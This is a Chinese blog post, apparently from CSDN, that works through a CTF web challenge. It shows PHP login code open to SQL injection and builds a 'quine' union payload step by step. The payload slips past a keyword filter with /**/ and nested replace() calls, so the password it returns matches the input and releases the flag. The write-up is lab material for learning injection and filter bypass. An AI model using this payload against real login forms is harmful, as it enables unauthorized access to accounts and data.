CTFHUB 2021-第五空间 yet_another_mysql_injection

最新推荐文章于 2024-06-29 00:28:48 发布
最新推荐文章于 2024-06-29 00:28:48 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: CTF-web(零散wp合集) 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/131553994
版权
文章详细分析了一个CTF比赛中的MySQL注入问题,由于WAF的存在,传统的注入方法无法奏效。作者通过深入研究,发现可以通过构造输入和输出完全一致的SQL语句,利用replace函数的特性,绕过WAF并成功进行注入,从而获取FLAG。这种方法涉及到对SQL语法的深刻理解和巧妙运用。
摘要由CSDN通过智能技术生成

CTFHUB 2021-第五空间 yet_another_mysql_injection

源码如下:

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
 
function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){   //②
        alertMes('hacker', 'index.php');
    }
}
 
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');//username===admin
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";   //①
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {//这个是关键③
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}
 
if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

分析源码点①得出账号一定是admin,只有password可控,是注入点。

分析②得出有waf。

分析点③这个if判断了从数据库中查到的密码是否和用户输入的是一样的,只有完全一致才会得到FLAG。

看到这里,发现盲注,报错,联合,堆叠都行不通。

关键代码:

if ($row['password'] === $password) {
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');

这个if判断了从数据库中查到的密码是否和用户输入的是一样的,只有完全一致才会得到FLAG,那这岂不是只能输入正确密码才能得到FLAG???

进入正题

通过分析发现只有输入正确的密码才能得到FLAG,但是这张表其实是一张空表,所以爆破密码这条路走不通。

那就只有一个办法,就是构造一个输入输出完全一致的语句,就可以绕过限制并得到FLAG

注入的payload

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

看到这里是不是一脸懵逼,别着急,慢慢分析

1.首先先了解一下replace()函数

  • replace(object,search,replace)
  • 把object对象中出现的的search全部替换成replace

看个例子

select replace(".",char(46),".");                 # char(46)就是.
+---------------------------+
| replace(".",char(46),".") |
+---------------------------+
| .                         |
+---------------------------+

2.如何让输入输出一致呢?

上面的例子用.替换object里的.,最终返回了一个.,那如果我们将object写成replace(".",char(46),".")会有什么变化呢?

mysql> select replace(   'replace(".",char(46),".")'   ,   char(46)   ,   '.'   );
+---------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'.') |
+---------------------------------------------------+
| replace(".",char(46),".")                         |
+---------------------------------------------------+

结果返回了replace(".",char(46),".")这个东西,即object不变,但还是没有达到我们预期的效果怎么办,这时候我们将第三个参数也改成replace(".",char(46),".")

mysql> select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
+---------------------------------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |   #单引号
+---------------------------------------------------------------------------+
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |   #双引号
+---------------------------------------------------------------------------+

有点类似套娃的感觉。先分析一下这段sql语句

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

replace函数的三个参数分别是

'replace(".",char(46),".")'
char(46)
'replace(".",char(46),".")'

这个语句的意思是用第三个参数替换第一个参数里面的.并返回替换后的第一个参数

这样就明白了为什么返回的是replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")")

那么这样是否就达到了我们输入输出一致的目的呢,答案肯定是还没有。细心点就会发现输入与输出在单双引号上有细微的不同

3.解决单双引号不同的问题

有了上面的经验后,我们这样考虑,如果先将双引号替换成单引号是不是就可以解决引号不同的问题了。实现方法无非就是在套一层replace

mysql> select replace(replace('"."',char(34),char(39)),char(46),".");    # 先执行内层replace
+--------------------------------------------------------+
| replace(replace('"."',char(34),char(39)),char(46),".") |
+--------------------------------------------------------+
| '.'                                                    |
+--------------------------------------------------------+
1 row in set (0.00 sec)

这样就可以将我们的双引号替换成单引号,此时我们继续沿用上面的思路,构造输入输出相同的语句

mysql> select replace(

replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),
char(46),
'replace(replace(".",char(34),char(39)),char(46),".")'

);
+------------------------------------------------------------------------------------------+
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') 
+------------------------------------------------------------------------------------------+
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') 
+------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Quine基本形式:

replace(replace(‘str’,char(34),char(39)),char(46),‘str’)

先将str里的双引号替换成单引号,再用str替换str里的.

str基本形式(可以理解成上面的".")

replace(replace(".",char(34),char(39)),char(46),".")

完整的Quine就是Quine基本形式+str基本形式

回过头来再看我们的payload

1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#
可理解成我们的Quine的基本形式

1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
这个就是我们str的基本形式

先将str里的双引号替换成单引号
1'/**/union/**/select/**/replace(replace('.',char(34),char(39)),char(46),'.')#
最终通过来回替换的形式达到了我们的目的

现在就明白了为什么我们的内层replace里面有一个单独的’’

Quine形式多变,修改的时候切记str对应也要修改

【还是有疑惑】个人感觉,之所以要构造一个输入输出完全一致的语句,是因为联合查询创造了一个新数据。

Jay 17
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2022-09-07 mysql8-对IN操作符-优化为EXISTS
技术之路
09-07 652
mysql8对于IN操作符, 存在使用EXISTS进行优化的策略。本文分析mysql8是如何实现此优化的。
怎么实现接口解耦_将接口与实现解耦-使用分离的接口
culh2177的博客
08-09 1175
怎么实现接口解耦If you’ve ever faced the same dilemma, surely you’ll grasp the sense of the following description: Cohesion and Decoupling, two seemingly naïve yet fundamental OOP cornerstones responsible for...
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1591
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
[第五空间-2021]yet_another_mysql_injection
liaochonxiang的博客
04-24 262
password输入必须和数据库中查询到的一样。username必须为admin。
第五空间yet_another_mysql_injection
最新发布
2301_80113257的博客
06-29 272
这时用quine注入。核心思想就是让sql语句执行的结果等于sql语句本身,来绕过这个验证。注出来fc3e129bd11f8e7ecf9fc816:eg1b5c4,但是密码显示错误。<>(大于小于号) -> least(),greatest()这题可以用上面链接中的脚本生成这个payload。根据提示访问source得到后端代码。结果和password是一样的!猜测password。先看最终的password。执行内层REPLACE。空格 -> /**/password变成。
Quine-[第五空间 2021]yet_another_mysql_injection
qq_74426248的博客
07-24 389
文章为[第五空间 2021]yet_another_mysql_injection的详细解析,欢迎一起讨论交流!!
[第五空间 2021]yet_another_mysql_injection wp
Leaf_initial的博客
07-07 488
在这个语句中,攻击者使用了 HEX 编码来表示 LIKE 运算符右侧的字符串,这个字符串实际上是 “unique_detect” 的 HEX 编码。由于白名单只允许使用特定的字符或字符串,而不允许使用特定的运算符或操作,因此攻击者可以使用这种方法来绕过白名单的限制,从而执行恶意的操作。白名单是一种更安全的防御措施,它会检查用户输入中是否包含一些特定的字符或字符串,并只允许这些字符或字符串被用于查询。都没有被过滤,可以编写脚本爆破密码 ,我这里直接找了一个师傅的脚本。直接访问,弱口令试一试就过了,账号。
MySql(四)SQL注入
爱是与世界平行
03-06 746
MySql(四)SQL注入一、SQL注入简介二、应用开发中可以采取的应对措施2.1 PrepartStatement+Bind-Variable2.2 使用应用程序提供的转换函数2.3 自定义函数进行校验 一、SQL注入简介 结构化查询语言( SQL)是一种用来和数据库交互的文本语言。SQL注入( SQL Injection )就是利用某些数据库的外部接口将用户数据插入到实际的数据库操作语言(SQ...
yet_another_mysql_injection
06-06
yet_another_mysql_injection是一种MySQL注入攻击的形式。MySQL注入攻击是指攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取或篡改数据库中的数据。这种攻击方式常常利用Web应用程序中的漏洞,例如未经过滤的...
NSSCTF-第五空间2021-wp
F1rstb100d
09-24 1172
NSSCTF-第五空间2021-wp
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 628
[第五空间 2021] wp
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
2021第五空间线上赛web wp
cosmoslin的博客
09-18 657
pklovecloud <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __c
mysql injection_SQL Injection with MySQL
weixin_35203962的博客
01-27 226
整个渗透过程就结束了,不过由于黑白把入口给改了,无法登陆,但我们仅仅测试注入,目的已经达到了,就没有必要进后台了,我后来又继续构造SQL语句来验证我们获取的密码是否正确,依次提交:http://127.0.0.1/ymdown/show.php?id=10unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhe...
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 773
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2021第五空间webakwp
fmyyy1的博客
09-18 1149
前言 挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。 附一张图 不过也算是ak了web 总体感觉还不错 webftp 这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的 赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。 EasyCleanup 源码逻辑很简单,给了phpinfo和任意文件包含 这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件 那
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3312
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
第五空间web复现
unexpectedthing的博客
09-27 770
@[]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值